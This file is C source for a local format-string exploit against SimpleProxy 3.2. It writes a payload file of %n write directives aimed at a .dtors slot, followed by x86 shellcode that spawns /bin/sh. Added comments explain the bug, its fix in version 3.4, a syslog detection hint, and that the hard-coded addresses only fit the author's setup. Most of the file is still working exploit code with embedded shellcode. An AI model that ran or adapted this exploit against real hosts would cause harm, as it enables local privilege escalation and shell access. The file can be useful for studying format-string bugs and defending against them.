/*
 * \ SimpleProxy 3.2 local format string exploit
 * -/ by Darkeagle
 * \ -/ syslog() function in simpleproxy.c
 *
 *++++++++++++++++++++++++++++++++++++++++
 * static void log(int type, char *format, ...)
 * {
 *     ...
 * #if HAVE_SYSLOG
 *     syslog(type,buffer);
 *     ...
 * }
 *
 * static struct lst_record *load_pop3_list(const char *popfile)
 * {
 *     ...
 *     if(*str=='\0') continue;
 *     log(LOG_INFO,"Adding '%s' to POP3 users list",str);
 *     ...
 * }
 *++++++++++++++++++++++++++++++++++++++++
 *
 * Other vulnerable calls of the log() function also exist, including a
 * remote one. One more local one is in the -P parameter:
 *
 * [darkeagle@localhost simpleproxy-3.2]$ ./simpleproxy -L 3337 -R localhost:110 -d -v -p1 -f sample.cfg -P AAAA%8$\x
 * [darkeagle@localhost simpleproxy-3.2]$ tail -2 /var/log/syslog
 * Aug 27 00:14:05 localhost simpleproxy[5755]: Can't open POP3 file: AAAA4141203a
 * Aug 27 00:14:05 localhost simpleproxy[5756]: Error binding socket.
 * [darkeagle@localhost simpleproxy-3.2]$
 *
 * Very easy to exploit. To exploit simpleproxy, pass 'popa3d.txt' as the
 * value of the -P parameter.
 *
 * The bug was corrected in the latest version (3.4).
 *
 * Enough.
 * \ -/ \ -/ \ -/
 */
#include
#include
#include
// We must begin !!!
/*
 * Payload generator for the SimpleProxy 3.2 log() format-string bug shown
 * in the header comment: log() hands attacker-controlled text to syslog()
 * as the *format* argument, so "%n"-style directives in a POP3 user-list
 * entry are interpreted instead of printed.  The root-cause fix is never to
 * pass non-literal data as a format string (syslog(type, "%s", buffer));
 * the header notes the bug was corrected in 3.4.  Detection hint: syslog
 * entries from this service containing "%n", "$n" or long "%x" runs are a
 * red flag, as in the "Can't open POP3 file: AAAA4141203a" sample above.
 *
 * Every address, stack offset and width below is specific to the author's
 * build and environment; nothing here is portable.
 */

/* Split a 32-bit value into its four bytes: b0 = most significant byte,
 * b3 = least significant byte. */
#define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
}

/* Raw 32-bit x86 machine code appended to the end of the payload.  The
 * "\x68" pushes carry the bytes of "/bin//sh", so this is presumably a
 * shell-spawning stub; the generator treats it as opaque data and only
 * ever copies it with strcat(). */
char shellcode[]= "\x31\xc0" "\x31\xdb" "\x31\xc9" "\xb0\x46" "\xcd\x80" "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x8d\x54\x24\x08" "\x50" "\x53" "\x8d\x0c\x24" "\xb0\x0b" "\xcd\x80" "\x31\xc0" "\xb0\x01" "\xcd\x80";

/*
 * Build the four-directive "%<width>x%<index>$n" string that makes four
 * "%n" writes, one per byte of retaddr.
 *
 *   retaddr  value whose bytes are written (split by doit()).
 *   offset   positional parameter index used by the first "%n"; the
 *            remaining three use offset+1 .. offset+3.
 *   base     number of bytes already emitted before the first directive;
 *            subtracted from the first width only.
 *   figure   subtracted from each byte before the widths are computed
 *            (main() passes 0x4).
 *
 * Returns a malloc(999)'d, zero-filled, NUL-terminated buffer that the
 * caller owns (main() never frees it and relies on process exit).
 *
 * NOTE(review): the malloc() result is not checked.  The first "%d"
 * argument has type size_t (it contains sizeof), not int, so the printed
 * width is only correct on an ABI where the two coincide; the other three
 * are plain int.
 */
char * evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure ) {
    char * buf;
    unsigned char b0, b1, b2, b3;
    int start = 256;  /* byte differences below lie in -255..255; adding 256 keeps every width positive */

    doit( b0, b1, b2, b3, retaddr );
    buf = (char *)malloc(999);
    memset( buf, 0, 999 );

    /* unsigned char arithmetic: each subtraction wraps modulo 256 */
    b3 -= figure;
    b2 -= figure;
    b1 -= figure;
    b0 -= figure;

    /* "%%" in the format below yields a literal '%' in buf, so the output
     * is "%<w1>x%<offset>$n%<w2>x%<offset+1>$n..." with the widths chained
     * so that each one is relative to the previous byte value. */
    snprintf( buf, 999, "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
              b3 - (sizeof( size_t ) * 4) + start - base, offset,
              b2 - b3 + start, offset + 1,
              b1 - b2 + start, offset + 2,
              b0 - b1 + start, offset + 3 );
    return buf;
}

/*
 * Write the finished payload to "popa3d.txt" in the current directory
 * (the header comment says this file is then given to simpleproxy via -P,
 * so that load_pop3_list() feeds its contents to log()/syslog()).
 *
 * File layout, in order: sixteen raw bytes (the four bytes of locaddr,
 * locaddr+1, locaddr+2 and locaddr+3, each emitted least-significant byte
 * first), the evil_builder() directive string, 48 bytes of 0x42 padding,
 * then the shellcode.  argc/argv are unused.
 *
 * NOTE(review): fopen() is not checked and the stream is never fclose()'d
 * (stdio flushes it at exit); the fprintf "%s" write stops at the first NUL
 * byte, so the payload relies on none of its bytes being zero.
 */
int main( int argc, char * argv[] ) {
    char * fmt;
    char endian[555];
    unsigned long locaddr, retaddr;
    unsigned int offset, base;
    unsigned char b0, b1, b2, b3;
    FILE *file;

    memset( endian, 0, 555 );
    file = fopen("popa3d.txt", "w+");

    /* Hard-coded, target-specific values from the author's environment. */
    locaddr = 0x804ce20;   // "dtorz addrz :=)" in the original -- presumably a .dtors slot
    retaddr = 0xbfffec54;  // shellcode addr
    offset = 5;            // positional index of the first pointer as seen by syslog()
    locaddr += 0x4;        // dtorz+0x4
    doit( b0, b1, b2, b3, locaddr );
    base = 4;

    /* Four 4-byte little-endian pointers (b3 is the low byte), each one
     * byte higher than the last, as the "%n" targets. */
    snprintf( endian, sizeof(endian), "%c%c%c%c" "%c%c%c%c" "%c%c%c%c" "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 1, b2, b1, b0,
              b3 + 2, b2, b1, b0,
              b3 + 3, b2, b1, b0 );

    fmt = evil_builder( retaddr, offset, base, 0x4 );
    /* Overwrite the NUL after the directive string with 48 'B' bytes; the
     * buffer was zero-filled, so it stays terminated for strcat(). */
    memset(fmt+strlen(fmt), 0x42, 48);
    strcat(fmt, shellcode);
    strcat(endian, fmt);   /* endian is 555 bytes; fmt is assumed to fit */
    fprintf(file, "%s", endian);
    return 0;
}

/* EoF */